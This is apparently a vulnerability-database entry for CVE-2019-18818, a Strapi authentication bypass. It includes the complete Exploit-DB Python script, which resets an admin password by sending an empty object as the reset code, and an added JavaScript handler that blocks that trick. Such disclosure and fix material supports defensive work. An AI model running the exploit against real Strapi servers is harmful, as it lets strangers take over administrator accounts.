Vendor: Strapi
By: David Anglada [CodiObert]
CVSS: 9.8 (CRITICAL)
Type: Authentication Bypass
CWE: 287
Product Name: Strapi
Affected Version From: 3.0.0-beta
Affected Version To: 3.0.0-alpha
Patch Exists: YES
Related CVE: CVE-2019-18818
CPE: a:strapi:strapi:3.0.0-beta
Metasploit: N/A
Other Scripts: N/A
Tags: cve2019,strapi,auth-bypass,intrusive,edb,cve
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei Metadata: {'max-request': 1, 'vendor': 'strapi', 'product': 'strapi'}
Platforms Tested: Linux
2021

Strapi 3.0.0-beta – Set Password (Unauthenticated)

Strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.

Mitigation:

Upgrade to Strapi 3.0.1 or later.

Exploit-DB raw data:

# Exploit Title: Strapi 3.0.0-beta - Set Password (Unauthenticated)
# Date: 2021-08-29
# Exploit Author: David Anglada [CodiObert]
# Vendor Homepage: https://strapi.io/
# Version: 3.0.0-beta
# Tested on: Linux
# CVE: CVE-2019-18818

#!/usr/bin/python

import requests
import sys
import json

userEmail = "valid@email.com"
strapiUrl = "http://strapi.url"
newPassword = "codiobert"

s = requests.Session()

# Get strapi version
strapiVersion = json.loads(s.get("{}/admin/strapiVersion".format(strapiUrl)).text)

print("[*] strapi version: {}".format(strapiVersion["strapiVersion"]))

# Validate vulnerable version
if strapiVersion["strapiVersion"].startswith('3.0.0-beta') or strapiVersion["strapiVersion"].startswith('3.0.0-alpha'):
	# Password reset
	print("[*] Password reset for user: {}".format(userEmail))
	resetPasswordReq={"email":userEmail, "url":"{}/admin/plugins/users-permissions/auth/reset-password".format(strapiUrl)}
	s.post("{}/".format(strapiUrl), json=resetPasswordReq)

	# Set new password
	print("[*] Setting new password")
	exploit={"code":{}, "password":newPassword, "passwordConfirmation":newPassword}
	r=s.post("{}/admin/auth/reset-password".format(strapiUrl), json=exploit)

	# Check if the password has changed
	if "username" in str(r.content):
		print("[+] New password '{}' set for user {}".format(newPassword, userEmail))
	else:
		print("\033[91m[-] Something went wrong\033[0m")
		sys.exit(1)
else:
	print("\033[91m[-] This version is not vulnerable\033[0m")
	sys.exit(1)
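
The script above sends `code` as an empty JSON object instead of a token string. As an added example (not Strapi's code and not from the exploit author), here is a reset handler that rejects that shape before any lookup happens; the store, the function names, the token format, the lifetime and the minimum password length are all assumptions.

```javascript
// Added example: hypothetical reset-token store, not Strapi's code.
const crypto = require('crypto');

const TOKEN_RE = /^[0-9a-f]{64}$/;   // assumed token format: 32 random bytes, hex
const TTL_MS = 15 * 60 * 1000;       // assumed 15 minute lifetime
const MIN_PASSWORD_LEN = 12;         // assumed password policy

const sha256 = (s) => crypto.createHash('sha256').update(s, 'utf8').digest('hex');

function createResetStore(now = () => Date.now()) {
  const pending = new Map();         // sha256(token) -> { userId, expires }
  return {
    // Issue a single-use token; only its hash is kept server side.
    issue(userId) {
      const token = crypto.randomBytes(32).toString('hex');
      pending.set(sha256(token), { userId, expires: now() + TTL_MS });
      return token;
    },
    // Validate every field's type before the token is looked up.
    redeem(body) {
      if (body === null || typeof body !== 'object' || Array.isArray(body)) {
        return { ok: false, error: 'invalid body' };
      }
      const { code, password, passwordConfirmation } = body;
      // Objects, arrays, numbers and empty strings never reach the lookup.
      if (typeof code !== 'string' || !TOKEN_RE.test(code)) {
        return { ok: false, error: 'invalid code' };
      }
      if (typeof password !== 'string' || password.length < MIN_PASSWORD_LEN ||
          password !== passwordConfirmation) {
        return { ok: false, error: 'invalid password' };
      }
      const key = sha256(code);
      const entry = pending.get(key);
      if (!entry) return { ok: false, error: 'unknown code' };
      pending.delete(key);           // single use, even when expired
      if (entry.expires < now()) return { ok: false, error: 'expired code' };
      return { ok: true, userId: entry.userId };
    },
  };
}
```

The caller changes the password only when `redeem` returns `ok: true`, and only for the returned `userId`.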